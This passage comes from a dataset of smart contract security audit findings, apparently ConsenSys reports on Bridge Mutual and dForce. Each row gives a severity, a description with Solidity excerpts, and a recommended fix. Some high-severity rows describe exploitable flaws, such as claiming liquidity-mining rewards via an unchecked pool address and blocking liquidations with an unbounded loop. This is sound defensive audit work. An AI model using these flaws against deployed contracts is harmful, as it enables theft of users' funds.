leaderboard.pop();\\n}\\n```\\n +Methods return values that are never used,low,"When a user calls `investDAI` these 3 methods are called internally:\\n```\\n\\_updateTopUsers();\\n\\_updateLeaderboard(\\_userTeamInfo.teamAddr);\\n\\_updateGroupLeaders(\\_userTeamInfo.teamAddr);\\n```\\n\\nEach method returns a boolean, but the value is never used. It is also unclear what the value should represent.",Remove the returned variable or use it in method `investDAI`.,,```\\n\\_updateTopUsers();\\n\\_updateLeaderboard(\\_userTeamInfo.teamAddr);\\n\\_updateGroupLeaders(\\_userTeamInfo.teamAddr);\\n```\\n +Save some gas when looping over state arrays,low,There are a few loops over state arrays in `LiquidutyMining`.\\n```\\nfor (uint256 i = 0; i < leaderboard.length; i++) {\\n```\\n\\n```\\nfor (uint256 i = 0; i < topUsers.length; i++) {\\n```\\n\\nConsider caching the length in a local variable to reduce gas costs.\\nSimilar to\\n```\\nuint256 \\_usersNumber = allUsers.length;\\n```\\n\\n```\\nfor (uint256 i = 0; i < \\_usersNumber; i++) {\\n```\\n,Reduce gas cost by caching array state length in a local variable.,,```\\nfor (uint256 i = 0; i < leaderboard.length; i++) {\\n```\\n +Optimize gas costs when handling liquidity start and end times,low,"When the `LiquidityMining` contract is deployed, `startLiquidityMiningTime` saves the current block timestamp.\\n```\\nstartLiquidityMiningTime = block.timestamp; \\n```\\n\\nThis value is never changed.\\nThere also exists an end limit calculated by `getEndLMTime`.\\n```\\nfunction getEndLMTime() public view override returns (uint256) {\\n return startLiquidityMiningTime.add(2 weeks);\\n}\\n```\\n\\nThis value is also fixed, once the start was defined.\\nNone of the values change after the contract was deployed. This is why you can use the immutable feature provided by Solidity.\\nIt will reduce costs significantly.\\n```\\ncontract A {\\n uint public immutable start;\\n uint public immutable end;\\n \\n constructor() {\\n start = block.timestamp;\\n end = block.timestamp + 2 weeks;\\n }\\n}\\n```\\n\\nThis contract defines 2 variables: `start` and `end` and their value is fixed on deploy and cannot be changed.\\nIt does not need to use `SafeMath` because there's no risk of overflowing.\\nSetting `public` on both variables creates getters, and calling `A.start()` and `A.end()` returns the respective values.\\nHaving set as immutable does not request EVM storage and makes them very cheap to access.",Use Solidity's immutable feature to reduce gas costs and rename variables for consistency.\\nUse the example for inspiration.,,```\\nstartLiquidityMiningTime = block.timestamp; \\n```\\n +Computing the quote should be done for a positive amount of tokens,low,"When a policy is bought, a quote is requested from the `PolicyQuote` contract.\\n```\\nfunction \\_buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens\\n) internal {\\n```\\n\\n```\\nuint256 \\_totalPrice = policyQuote.getQuote(\\_totalSeconds, \\_coverTokens, address(this));\\n```\\n\\nThe `getQuote` call is then forwarded to an internal function\\n```\\nfunction getQuote(uint256 \\_durationSeconds, uint256 \\_tokens, address \\_policyBookAddr)\\n external view override returns (uint256 \\_daiTokens)\\n{\\n \\_daiTokens = \\_getQuote(\\_durationSeconds, \\_tokens, \\_policyBookAddr);\\n}\\n```\\n\\n```\\nfunction \\_getQuote(uint256 \\_durationSeconds, uint256 \\_tokens, address \\_policyBookAddr)\\n internal view returns (uint256)\\n{\\n```\\n\\nThere are some basic checks that make sure the total covered tokens with the requested quote do not exceed the total liquidity. On top of that check, it makes sure the total liquidity is positive.\\n```\\nrequire(\\_totalCoverTokens.add(\\_tokens) <= \\_totalLiquidity, ""PolicyBook: Requiring more than there exists"");\\nrequire(\\_totalLiquidity > 0, ""PolicyBook: The pool is empty"");\\n```\\n\\nBut there is no check for the number of quoted tokens. It should also be positive.","Add an additional check for the number of quoted tokens to be positive. The check could fail or return 0, depending on your use case.\\nIf you add a check for the number of quoted tokens to be positive, the check for `_totalLiquidity` to be positive becomes obsolete and can be removed.",,"```\\nfunction \\_buyPolicyFor(\\n address \\_policyHolderAddr,\\n uint256 \\_epochsNumber,\\n uint256 \\_coverTokens\\n) internal {\\n```\\n" +Anyone can win all the funds from the LiquidityMining without investing any DAI,high,"When a user decides to `investDAI` in the `LiquidityMining` contract, the policy book address is passed as a parameter:\\n```\\nfunction investDAI(uint256 \\_tokensAmount, address \\_policyBookAddr) external override {\\n```\\n\\nBut this parameter is never checked and only used at the end of the function:\\n```\\nIPolicyBook(\\_policyBookAddr).addLiquidityFromLM(msg.sender, \\_tokensAmount);\\n```\\n\\nThe attacker can pass the address of a simple multisig that will process this transaction successfully without doing anything. And pretend to invest a lot of DAI without actually doing that to win all the rewards in the `LiquidityMining` contract.",Check that the pool address is valid.,,"```\\nfunction investDAI(uint256 \\_tokensAmount, address \\_policyBookAddr) external override {\\n```\\n" +Liquidity withdrawal can be blocked,high,"The main problem in that issue is that the liquidity provider may face many potential issues when withdrawing the liquidity. Under some circumstances, a normal user will never be able to withdraw the liquidity. This issue consists of multiple factors that are interconnected and share the same solution.\\nThere are no partial withdrawals when in the queue. When the withdrawal request is added to the queue, it can only be processed fully:\\n```\\naddress \\_currentAddr = withdrawalQueue.head();\\nuint256 \\_tokensToWithdraw = withdrawalsInfo[\\_currentAddr].withdrawalAmount;\\n \\nuint256 \\_amountInDAI = convertDAIXtoDAI(\\_tokensToWithdraw);\\n \\nif (\\_availableLiquidity < \\_amountInDAI) {\\n break;\\n}\\n```\\n\\nBut when the request is not in the queue, it can still be processed partially, and the rest of the locked tokens will wait in the queue.\\n```\\n} else if (\\_availableLiquidity < convertDAIXtoDAI(\\_tokensToWithdraw)) {\\n uint256 \\_availableDAIxTokens = convertDAIToDAIx(\\_availableLiquidity);\\n uint256 \\_currentWithdrawalAmount = \\_tokensToWithdraw.sub(\\_availableDAIxTokens);\\n withdrawalsInfo[\\_msgSender()].withdrawalAmount = \\_currentWithdrawalAmount;\\n \\n aggregatedQueueAmount = aggregatedQueueAmount.add(\\_currentWithdrawalAmount);\\n withdrawalQueue.push(\\_msgSender());\\n \\n \\_withdrawLiquidity(\\_msgSender(), \\_availableDAIxTokens);\\n} else {\\n```\\n\\nIf there's a huge request in the queue, it can become a bottleneck that does not allow others to withdraw even if there is enough free liquidity.\\nWithdrawals can be blocked forever by the bots.\\nThe withdrawal can only be requested if there are enough free funds in the contract. But once these funds appear, the bots can instantly buy a policy, and for the normal users, it will be impossible to request the withdrawal. Even when a withdrawal is requested and then in the queue, the same problem appears at that stage.\\nThe policy can be bought even if there are pending withdrawals in the queue.","One of the solutions would be to implement the following changes, but the team should thoroughly consider them:\\nAllow people to request the withdrawal even if there is not enough liquidity at the moment.\\nDo not allow people to buy policies if there are pending withdrawals in the queue and cannot be executed.\\n(Optional) Even when the queue is empty, do not allow people to buy policies if there is not enough liquidity for the pending requests (that are not yet in the queue).\\n(Optional if the points above are implemented) Allow partial executions of the withdrawals in the queue.",,```\\naddress \\_currentAddr = withdrawalQueue.head();\\nuint256 \\_tokensToWithdraw = withdrawalsInfo[\\_currentAddr].withdrawalAmount;\\n \\nuint256 \\_amountInDAI = convertDAIXtoDAI(\\_tokensToWithdraw);\\n \\nif (\\_availableLiquidity < \\_amountInDAI) {\\n break;\\n}\\n```\\n +The totalCoverTokens can be decreased before the claim is committed,high,"The `totalCoverTokens` is decreased right after the policy duration ends (_endEpochNumber). When that happens, the liquidity providers can withdraw their funds:\\n```\\npolicyHolders[\\_msgSender()] = PolicyHolder(\\_coverTokens, currentEpochNumber,\\n \\_endEpochNumber, \\_totalPrice, \\_reinsurancePrice);\\n\\nepochAmounts[\\_endEpochNumber] = epochAmounts[\\_endEpochNumber].add(\\_coverTokens);\\n```\\n\\n```\\nuint256 \\_countOfPassedEpoch = block.timestamp.sub(epochStartTime).div(EPOCH\\_DURATION);\\n\\nnewTotalCoverTokens = totalCoverTokens;\\nlastEpochUpdate = currentEpochNumber;\\nnewEpochNumber = \\_countOfPassedEpoch.add(1);\\n\\nfor (uint256 i = lastEpochUpdate; i < newEpochNumber; i++) {\\n newTotalCoverTokens = newTotalCoverTokens.sub(epochAmounts[i]); \\n}\\n```\\n\\nOn the other hand, the claim can be created while the policy is still “active”. And is considered active until one week after the policy expired:\\n```\\nfunction isPolicyActive(address \\_userAddr, address \\_policyBookAddr) public override view returns (bool) {\\n PolicyInfo storage \\_currentInfo = policyInfos[\\_userAddr][\\_policyBookAddr];\\n\\n if (\\_currentInfo.endTime == 0) {\\n return false;\\n }\\n\\n return \\_currentInfo.endTime.add(STILL\\_CLAIMABLE\\_FOR) > block.timestamp;\\n}\\n```\\n\\nBy the time when the claim is created + voted, the liquidity provider can potentially withdraw all of their funds already, and the claim will fail.",Make sure that there will always be enough funds for the claim.,,"```\\npolicyHolders[\\_msgSender()] = PolicyHolder(\\_coverTokens, currentEpochNumber,\\n \\_endEpochNumber, \\_totalPrice, \\_reinsurancePrice);\\n\\nepochAmounts[\\_endEpochNumber] = epochAmounts[\\_endEpochNumber].add(\\_coverTokens);\\n```\\n" +The totalCoverTokens is not decreased after the claim happened,high,"When the claim happens and the policy is removed, the `totalCoverTokens` should be decreased instantly, that's why the scheduled reduction value is removed:\\n```\\nPolicyHolder storage holder = policyHolders[claimer];\\n\\nepochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\ntotalLiquidity = totalLiquidity.sub(claimAmount);\\n\\ndaiToken.transfer(claimer, claimAmount);\\n \\ndelete policyHolders[claimer];\\npolicyRegistry.removePolicy(claimer);\\n```\\n\\nBut the `totalCoverTokens` is not changed and will have the coverage from the removed policy forever.",Decrease the `totalCoverTokens` inside the `commitClaim` function.,,"```\\nPolicyHolder storage holder = policyHolders[claimer];\\n\\nepochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\ntotalLiquidity = totalLiquidity.sub(claimAmount);\\n\\ndaiToken.transfer(claimer, claimAmount);\\n \\ndelete policyHolders[claimer];\\npolicyRegistry.removePolicy(claimer);\\n```\\n" +The Queue remove function does not remove the item completely,high,"When removing an item in a queue, the following function is used:\\n```\\nfunction remove(UniqueAddressQueue storage baseQueue, address addrToRemove) internal returns (bool) {\\n if (!contains(baseQueue, addrToRemove)) {\\n return false;\\n }\\n\\n if (baseQueue.HEAD == addrToRemove) {\\n return removeFirst(baseQueue);\\n }\\n\\n if (baseQueue.TAIL == addrToRemove) {\\n return removeLast(baseQueue);\\n }\\n\\n address prevAddr = baseQueue.queue[addrToRemove].prev;\\n address nextAddr = baseQueue.queue[addrToRemove].next;\\n baseQueue.queue[prevAddr].next = nextAddr;\\n baseQueue.queue[nextAddr].prev = prevAddr;\\n baseQueue.queueLength--;\\n\\n return true;\\n}\\n```\\n\\nAs the result, the `baseQueue.queue[addrToRemove]` is not deleted, so the `contains` function will still return `True` after the removal.",Remove the element from the queue completely.,,"```\\nfunction remove(UniqueAddressQueue storage baseQueue, address addrToRemove) internal returns (bool) {\\n if (!contains(baseQueue, addrToRemove)) {\\n return false;\\n }\\n\\n if (baseQueue.HEAD == addrToRemove) {\\n return removeFirst(baseQueue);\\n }\\n\\n if (baseQueue.TAIL == addrToRemove) {\\n return removeLast(baseQueue);\\n }\\n\\n address prevAddr = baseQueue.queue[addrToRemove].prev;\\n address nextAddr = baseQueue.queue[addrToRemove].next;\\n baseQueue.queue[prevAddr].next = nextAddr;\\n baseQueue.queue[nextAddr].prev = prevAddr;\\n baseQueue.queueLength--;\\n\\n return true;\\n}\\n```\\n" +Optimization issue,medium,"The codebase is huge, and there are still a lot of places where these complications and gas efficiency can be improved.\\n`_updateTopUsers`, `_updateGroupLeaders`, `_updateLeaderboard` are having a similar mechanism of adding users to a sorted set which makes more storage operations than needed:\\n```\\nuint256 \\_tmpIndex = \\_currentIndex - 1;\\nuint256 \\_currentUserAmount = usersTeamInfo[msg.sender].stakedAmount;\\n \\nwhile (\\_currentUserAmount > usersTeamInfo[topUsers[\\_tmpIndex]].stakedAmount) {\\n address \\_tmpAddr = topUsers[\\_tmpIndex];\\n topUsers[\\_tmpIndex] = msg.sender;\\n topUsers[\\_tmpIndex + 1] = \\_tmpAddr;\\n \\n if (\\_tmpIndex == 0) {\\n break;\\n }\\n \\n \\_tmpIndex--;\\n}\\n```\\n\\nInstead of doing 2 operations per item that is lower than the new_item, same can be done with one operation: while `topUsers[_tmpIndex]` is lower than the new itemtopUsers[_tmpIndex + 1] = `topUsers[_tmpIndex]`.\\ncreating the Queue library looks like overkill `for` the intended task. It is only used `for` the withdrawal queue in the PolicyBook. The structure stores and processes extra data, which is unnecessary and more expensive. A larger codebase also has a higher chance of introducing a bug (and it happened here https://github.com/ConsenSys/bridge-mutual-audit-2021-03/issues/25). It's usually better to have a simpler and optimized version like described here issue 5.14.\\nThere are a few `for` loops that are using `uint8` iterators. It's unnecessary and can be even more expensive because, under the hood, it's additionally converted to `uint256` all the time. In general, shrinking data to `uint8` makes sense to optimize storage slots, but that's not the case here.\\nThe value that is calculated in a loop can be obtained simpler by just having a 1-line formula:\\n```\\nfunction \\_getAvailableMonthForReward(address \\_userAddr) internal view returns (uint256) {\\n uint256 \\_oneMonth = 30 days;\\n uint256 \\_startRewardTime = getEndLMTime();\\n \\n uint256 \\_countOfRewardedMonth = countsOfRewardedMonth[usersTeamInfo[\\_userAddr].teamAddr][\\_userAddr];\\n uint256 \\_numberOfMonthForReward;\\n \\n for (uint256 i = \\_countOfRewardedMonth; i < MAX\\_MONTH\\_TO\\_GET\\_REWARD; i++) {\\n if (block.timestamp > \\_startRewardTime.add(\\_oneMonth.mul(i))) {\\n \\_numberOfMonthForReward++;\\n } else {\\n break;\\n }\\n }\\n \\n return \\_numberOfMonthForReward;\\n}\\n```\\n\\nThe mapping is using 2 keys, but the first key is strictly defined by the second one, so there's no need for it:\\n```\\n// Referral link => Address => count of rewarded month\\nmapping (address => mapping (address => uint256)) public countsOfRewardedMonth;\\n```\\n\\nThere are a lot of structures in the code with duplicated and unnecessary data, for example:\\n```\\nstruct UserTeamInfo {\\n string teamName;\\n address teamAddr;\\n \\n uint256 stakedAmount;\\n bool isNFTDistributed;\\n}\\n```\\n\\nHere the structure is created for every team member, duplicating the team name for each member.",Optimize and simplify the code.,,```\\nuint256 \\_tmpIndex = \\_currentIndex - 1;\\nuint256 \\_currentUserAmount = usersTeamInfo[msg.sender].stakedAmount;\\n \\nwhile (\\_currentUserAmount > usersTeamInfo[topUsers[\\_tmpIndex]].stakedAmount) {\\n address \\_tmpAddr = topUsers[\\_tmpIndex];\\n topUsers[\\_tmpIndex] = msg.sender;\\n topUsers[\\_tmpIndex + 1] = \\_tmpAddr;\\n \\n if (\\_tmpIndex == 0) {\\n break;\\n }\\n \\n \\_tmpIndex--;\\n}\\n```\\n +The aggregatedQueueAmount value is used inconsistently,medium,"The `aggregatedQueueAmount` variable represents the cumulative DAIx amount in the queue that is waiting for the withdrawal. When requesting the withdrawal, this value is used as the amount of DAI that needs to be withdrawn, which may be significantly different:\\n```\\nrequire(totalLiquidity >= totalCoverTokens.add(aggregatedQueueAmount).add(\\_daiTokensToWithdraw),\\n ""PB: Not enough available liquidity"");\\n```\\n\\nThat may lead to allowing the withdrawal request even if it shouldn't be allowed and the opposite.",Convert `aggregatedQueueAmount` to DAI in the `_requestWithdrawal`.,,"```\\nrequire(totalLiquidity >= totalCoverTokens.add(aggregatedQueueAmount).add(\\_daiTokensToWithdraw),\\n ""PB: Not enough available liquidity"");\\n```\\n" +The claim can only be done once,medium,"When the claim happens, the policy is removed afterward:\\n```\\nfunction commitClaim(address claimer, uint256 claimAmount)\\n external \\n override\\n onlyClaimVoting\\n updateBMIDAIXStakingReward\\n{\\n PolicyHolder storage holder = policyHolders[claimer];\\n\\n epochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\n totalLiquidity = totalLiquidity.sub(claimAmount);\\n \\n daiToken.transfer(claimer, claimAmount);\\n \\n delete policyHolders[claimer];\\n policyRegistry.removePolicy(claimer);\\n}\\n```\\n\\nIf the claim amount is much lower than the coverage, the users are incentivized not to submit it and wait until the end of the coverage period to accumulate all the claims into one.",Allow the policyholders to submit multiple claims until the `coverTokens` is not reached.,,"```\\nfunction commitClaim(address claimer, uint256 claimAmount)\\n external \\n override\\n onlyClaimVoting\\n updateBMIDAIXStakingReward\\n{\\n PolicyHolder storage holder = policyHolders[claimer];\\n\\n epochAmounts[holder.endEpochNumber] = epochAmounts[holder.endEpochNumber].sub(holder.coverTokens);\\n totalLiquidity = totalLiquidity.sub(claimAmount);\\n \\n daiToken.transfer(claimer, claimAmount);\\n \\n delete policyHolders[claimer];\\n policyRegistry.removePolicy(claimer);\\n}\\n```\\n" +iETH.exchangeRateStored may not be accurate when invoked from external contracts,high,"`iETH.exchangeRateStored` returns the exchange rate of the contract as a function of the current cash of the contract. In the case of `iETH`, current cash is calculated as the contract's ETH balance minus msg.value:\\n```\\n/\\*\\*\\n \\* @dev Gets balance of this contract in terms of the underlying\\n \\*/\\nfunction \\_getCurrentCash() internal view override returns (uint256) {\\n return address(this).balance.sub(msg.value);\\n}\\n```\\n\\n`msg.value` is subtracted because the majority of `iETH` methods are payable, and `msg.value` is implicitly added to a contract's balance before execution begins. If `msg.value` were not subtracted, the value sent with a call could be used to inflate the contract's exchange rate artificially.\\nAs part of execution, `iETH` makes calls to the `Controller`, which performs important checks using (among other things) the stored exchange rate. When `exchangeRateStored` is invoked from the `Controller`, the call context has a `msg.value` of 0. However, the `msg.value` sent by the initial `iETH` execution is still included in the contract's balance. This means that the `Controller` receives an exchange rate inflated by the initial call's `msg.value`.\\nThis problem occurs in multiple locations in the Controller:\\n`beforeMint` uses the exchange rate to ensure the supply capacity of the market is not reached. In this case, inflation would prevent the entire supply capacity of the market from being utilized:\\n```\\n// Check the iToken's supply capacity, -1 means no limit\\nuint256 \\_totalSupplyUnderlying =\\n IERC20Upgradeable(\\_iToken).totalSupply().rmul(\\n IiToken(\\_iToken).exchangeRateStored()\\n );\\nrequire(\\n \\_totalSupplyUnderlying.add(\\_mintAmount) <= \\_market.supplyCapacity,\\n ""Token supply capacity reached""\\n);\\n```\\n\\n`beforeLiquidateBorrow` uses the exchange rate via `calcAccountEquity` to calculate the value of the borrower's collateral. In this case, inflation would increase the account's equity, which could prevent the liquidator from liquidating:\\n```\\n(, uint256 \\_shortfall, , ) = calcAccountEquity(\\_borrower);\\n\\nrequire(\\_shortfall > 0, ""Account does not have shortfall"");\\n```\\n","Resolution\\nThis issue was addressed in commit `9876e3a` by using a modifier to track the current `msg.value` of payable functions.\\nRather than having the `Controller` query the `iETH.exchangeRateStored`, the exchange rate could be passed-in to `Controller` methods as a parameter.\\nEnsure no other components in the system rely on `iETH.exchangeRateStored` after being called from `iETH`.",,```\\n/\\*\\*\\n \\* @dev Gets balance of this contract in terms of the underlying\\n \\*/\\nfunction \\_getCurrentCash() internal view override returns (uint256) {\\n return address(this).balance.sub(msg.value);\\n}\\n```\\n +Unbounded loop in Controller.calcAccountEquity allows DoS on liquidation,high,"`Controller.calcAccountEquity` calculates the relative value of a user's supplied collateral and their active borrow positions. Users may mark an arbitrary number of assets as collateral, and may borrow from an arbitrary number of assets. In order to calculate the value of both of these positions, this method performs two loops.\\nFirst, to calculate the sum of the value of a user's collateral:\\n```\\n// Calculate value of all collaterals\\n// collateralValuePerToken = underlyingPrice \\* exchangeRate \\* collateralFactor\\n// collateralValue = balance \\* collateralValuePerToken\\n// sumCollateral += collateralValue\\nuint256 \\_len = \\_accountData.collaterals.length();\\nfor (uint256 i = 0; i < \\_len; i++) {\\n IiToken \\_token = IiToken(\\_accountData.collaterals.at(i));\\n```\\n\\nSecond, to calculate the sum of the value of a user's borrow positions:\\n```\\n// Calculate all borrowed value\\n// borrowValue = underlyingPrice \\* underlyingBorrowed / borrowFactor\\n// sumBorrowed += borrowValue\\n\\_len = \\_accountData.borrowed.length();\\nfor (uint256 i = 0; i < \\_len; i++) {\\n IiToken \\_token = IiToken(\\_accountData.borrowed.at(i));\\n```\\n\\nFrom dForce, we learned that 200 or more assets would be supported by the Controller. This means that a user with active collateral and borrow positions on all 200 supported assets could force any `calcAccountEquity` action to perform some 400 iterations of these loops, each with several expensive external calls.\\nBy modifying dForce's unit test suite, we showed that an attacker could force the cost of `calcAccountEquity` above the block gas limit. This would prevent all of the following actions, as each relies on calcAccountEquity:\\n`iToken.transfer` and `iToken.transferFrom`\\n`iToken.redeem` and `iToken.redeemUnderlying`\\n`iToken.borrow`\\n`iToken.liquidateBorrow` and `iToken.seize`\\nThe following actions would still be possible:\\n`iToken.mint`\\n`iToken.repayBorrow` and `iToken.repayBorrowBehalf`\\nAs a result, an attacker may abuse the unbounded looping in `calcAccountEquity` to prevent the liquidation of underwater positions. We provided dForce with a PoC here: gist.","There are many possible ways to address this issue. Some ideas have been outlined below, and it may be that a combination of these ideas is the best approach:\\nIn general, cap the number of markets and borrowed assets a user may have: The primary cause of the DoS is that the number of collateral and borrow positions held by a user is only restricted by the number of supported assets. The PoC provided above showed that somewhere around 150 collateral positions and 150 borrow positions, the gas costs of `calcAccountEquity` use most of the gas in a block. Given that gas prices often spike along with turbulent market conditions and that liquidations are far more likely in turbulent market conditions, a cap on active markets / borrows should be much lower than 150 each so as to keep the cost of liquidations as low as possible.\\ndForce should perform their own gas cost estimates to determine a cap, and choose a safe, low value. Estimates should be performed on the high-level `liquidateBorrow` method, so as to simulate an actual liquidation event. Additionally, estimates should factor in a changing block gas limit, and the possibility of opcode gas costs changing in future forks. It may be wise to make this cap configurable, so that the limits may be adjusted for future conditions.",,```\\n// Calculate value of all collaterals\\n// collateralValuePerToken = underlyingPrice \\* exchangeRate \\* collateralFactor\\n// collateralValue = balance \\* collateralValuePerToken\\n// sumCollateral += collateralValue\\nuint256 \\_len = \\_accountData.collaterals.length();\\nfor (uint256 i = 0; i < \\_len; i++) {\\n IiToken \\_token = IiToken(\\_accountData.collaterals.at(i));\\n```\\n +Fix utilization rate computation and respect reserves when lending,medium,"The utilization rate `UR` of an asset forms the basis for interest calculations and is defined as `borrows / ( borrows + cash - reserves)`.\\n```\\n/\\*\\*\\n \\* @notice Calculate the utilization rate: `\\_borrows / (\\_cash + \\_borrows - \\_reserves)`\\n \\* @param \\_cash Asset balance\\n \\* @param \\_borrows Asset borrows\\n \\* @param \\_reserves Asset reserves\\n \\* @return Asset utilization [0, 1e18]\\n \\*/\\nfunction utilizationRate(\\n uint256 \\_cash,\\n uint256 \\_borrows,\\n uint256 \\_reserves\\n) internal pure returns (uint256) {\\n // Utilization rate is 0 when there are no borrows\\n if (\\_borrows == 0) return 0;\\n\\n return \\_borrows.mul(BASE).div(\\_cash.add(\\_borrows).sub(\\_reserves));\\n}\\n```\\n\\nThe implicit assumption here is that `reserves` <= cash; in this case — and if we define `UR` as `0` for `borrows == 0` — we have `0` <= `UR` <=1. We can view `cash` - `reserves` as “available cash”. However, the system does not guarantee that `reserves` never exceeds `cash`. If `reserves` > `cash` (and borrows + `cash` - `reserves` > 0), the formula for `UR` above gives a utilization rate above `1`. This doesn't make much sense conceptually and has undesirable technical consequences; an especially severe one is analyzed in issue 4.4.","If `reserves > cash` — or, in other words, available cash is negative — this means part of the `reserves` have been borrowed, which ideally shouldn't happen in the first place. However, the `reserves` grow automatically over time, so it might be difficult to avoid this entirely. We recommend (1) avoiding this situation whenever it is possible and (2) fixing the `UR` computation such that it deals more gracefully with this scenario. More specifically:\\nLoan amounts should not be checked to be smaller than or equal to `cash` but `cash - reserves` (which might be negative). Note that the current check against `cash` happens more or less implicitly because the transfer just fails for insufficient `cash`.\\nMake the utilization rate computation return `1` if `reserves > cash` (unless borrows == `0`, in which case return `0` as is already the case).\\nRemark\\nInternally, the utilization rate and other fractional values are scaled by `1e18`. The discussion above has a more conceptual than technical perspective, so we used unscaled numbers. When making changes to the code, care must be taken to apply the scaling.",,"```\\n/\\*\\*\\n \\* @notice Calculate the utilization rate: `\\_borrows / (\\_cash + \\_borrows - \\_reserves)`\\n \\* @param \\_cash Asset balance\\n \\* @param \\_borrows Asset borrows\\n \\* @param \\_reserves Asset reserves\\n \\* @return Asset utilization [0, 1e18]\\n \\*/\\nfunction utilizationRate(\\n uint256 \\_cash,\\n uint256 \\_borrows,\\n uint256 \\_reserves\\n) internal pure returns (uint256) {\\n // Utilization rate is 0 when there are no borrows\\n if (\\_borrows == 0) return 0;\\n\\n return \\_borrows.mul(BASE).div(\\_cash.add(\\_borrows).sub(\\_reserves));\\n}\\n```\\n" +"If Base._updateInterest fails, the entire system will halt",medium,"Before executing most methods, the `iETH` and `iToken` contracts update interest accumulated on borrows via the method `Base._updateInterest`. This method uses the contract's interest rate model to calculate the borrow interest rate. If the calculated value is above `maxBorrowRate` (0.001e18), the method will revert:\\n```\\nfunction \\_updateInterest() internal virtual override {\\n InterestLocalVars memory \\_vars;\\n \\_vars.currentCash = \\_getCurrentCash();\\n \\_vars.totalBorrows = totalBorrows;\\n \\_vars.totalReserves = totalReserves;\\n\\n // Gets the current borrow interest rate.\\n \\_vars.borrowRate = interestRateModel.getBorrowRate(\\n \\_vars.currentCash,\\n \\_vars.totalBorrows,\\n \\_vars.totalReserves\\n );\\n require(\\n \\_vars.borrowRate <= maxBorrowRate,\\n ""\\_updateInterest: Borrow rate is too high!""\\n );\\n```\\n\\nIf this method reverts, the entire contract may halt and be unrecoverable. The only ways to change the values used to calculate this interest rate lie in methods that must first call `Base._updateInterest`. In this case, those methods would fail.\\nOne other potential avenue for recovery exists: the Owner role may update the interest rate calculation contract via TokenAdmin._setInterestRateModel:\\n```\\n/\\*\\*\\n \\* @dev Sets a new interest rate model.\\n \\* @param \\_newInterestRateModel The new interest rate model.\\n \\*/\\nfunction \\_setInterestRateModel(\\n IInterestRateModelInterface \\_newInterestRateModel\\n) external virtual onlyOwner settleInterest {\\n // Gets current interest rate model.\\n IInterestRateModelInterface \\_oldInterestRateModel = interestRateModel;\\n\\n // Ensures the input address is the interest model contract.\\n require(\\n \\_newInterestRateModel.isInterestRateModel(),\\n ""\\_setInterestRateModel: This is not the rate model contract!""\\n );\\n\\n // Set to the new interest rate model.\\n interestRateModel = \\_newInterestRateModel;\\n```\\n\\nHowever, this method also calls `Base._updateInterest` before completing the upgrade, so it would fail as well.\\nWe used interest rate parameters taken from dForce's unit tests to determine whether any of the interest rate models could return a borrow rate that would cause this failure. The default `InterestRateModel` is deployed using these values:\\n```\\nbaseInterestPerBlock: 0\\ninterestPerBlock: 5.074e10\\nhighInterestPerBlock: 4.756e11\\nhigh: 0.75e18\\n```\\n\\nPlugging these values in to their borrow rate calculations, we determined that the utilization rate of the contract would need to be `2103e18` in order to reach the max borrow rate and trigger a failure. Plugging this in to the formula for utilization rate, we derived the following ratio:\\n`reserves >= (2102/2103)*borrows + cash`\\nWith the given interest rate parameters, if token reserves, total borrows, and underlying cash meet the above ratio, the interest rate model would return a borrow rate above the maximum, leading to the failure conditions described above.","Note that the examples above depend on the specific interest rate parameters configured by dForce. In general, with reasonable interest rate parameters and a reasonable reserve ratio, it seems unlikely that the maximum borrow rate will be reached. Consider implementing the following changes as a precaution:\\nAs utilization rate should be between `0` and `1` (scaled by 1e18), prevent utilization rate calculations from returning anything above `1e18`. See issue 4.3 for a more thorough discussion of this topic.\\nRemove the `settleInterest` modifier from TokenAdmin._setInterestRateModel: In a worst case scenario, this will allow the Owner role to update the interest rate model without triggering the failure in `Base._updateInterest`.",,"```\\nfunction \\_updateInterest() internal virtual override {\\n InterestLocalVars memory \\_vars;\\n \\_vars.currentCash = \\_getCurrentCash();\\n \\_vars.totalBorrows = totalBorrows;\\n \\_vars.totalReserves = totalReserves;\\n\\n // Gets the current borrow interest rate.\\n \\_vars.borrowRate = interestRateModel.getBorrowRate(\\n \\_vars.currentCash,\\n \\_vars.totalBorrows,\\n \\_vars.totalReserves\\n );\\n require(\\n \\_vars.borrowRate <= maxBorrowRate,\\n ""\\_updateInterest: Borrow rate is too high!""\\n );\\n```\\n" +RewardDistributor requirement prevents transition of Owner role to smart contract,medium,"From dForce, we learned that the eventual plan for the system Owner role is to use a smart contract (a multisig or DAO). However, a requirement in `RewardDistributor` would prevent the `onlyOwner` method `_setDistributionFactors` from working in this case.\\n`_setDistributionFactors` calls `updateDistributionSpeed`, which requires that the caller is an EOA:\\n```\\n/\\*\\*\\n \\* @notice Update each iToken's distribution speed according to current global speed\\n \\* @dev Only EOA can call this function\\n \\*/\\nfunction updateDistributionSpeed() public override {\\n require(msg.sender == tx.origin, ""only EOA can update speeds"");\\n require(!paused, ""Can not update speeds when paused"");\\n\\n // Do the actual update\\n \\_updateDistributionSpeed();\\n}\\n```\\n\\nIn the event the Owner role is a smart contract, this statement would necessitate a complicated upgrade to restore full functionality.","Rather than invoking `updateDistributionSpeed`, have `_setDistributionFactors` directly call the internal helper `_updateDistributionSpeed`, which does not require the caller is an EOA.",,"```\\n/\\*\\*\\n \\* @notice Update each iToken's distribution speed according to current global speed\\n \\* @dev Only EOA can call this function\\n \\*/\\nfunction updateDistributionSpeed() public override {\\n require(msg.sender == tx.origin, ""only EOA can update speeds"");\\n require(!paused, ""Can not update speeds when paused"");\\n\\n // Do the actual update\\n \\_updateDistributionSpeed();\\n}\\n```\\n" +MSDController._withdrawReserves does not update interest before withdrawal,medium,"`MSDController._withdrawReserves` allows the Owner to mint the difference between an MSD asset's accumulated debt and earnings:\\n```\\nfunction \\_withdrawReserves(address \\_token, uint256 \\_amount)\\n external\\n onlyOwner\\n onlyMSD(\\_token)\\n{\\n (uint256 \\_equity, ) = calcEquity(\\_token);\\n\\n require(\\_equity >= \\_amount, ""Token do not have enough reserve"");\\n\\n // Increase the token debt\\n msdTokenData[\\_token].debt = msdTokenData[\\_token].debt.add(\\_amount);\\n\\n // Directly mint the token to owner\\n MSD(\\_token).mint(owner, \\_amount);\\n```\\n\\nDebt and earnings are updated each time the asset's `iMSD` and `MSDS` contracts are used for the 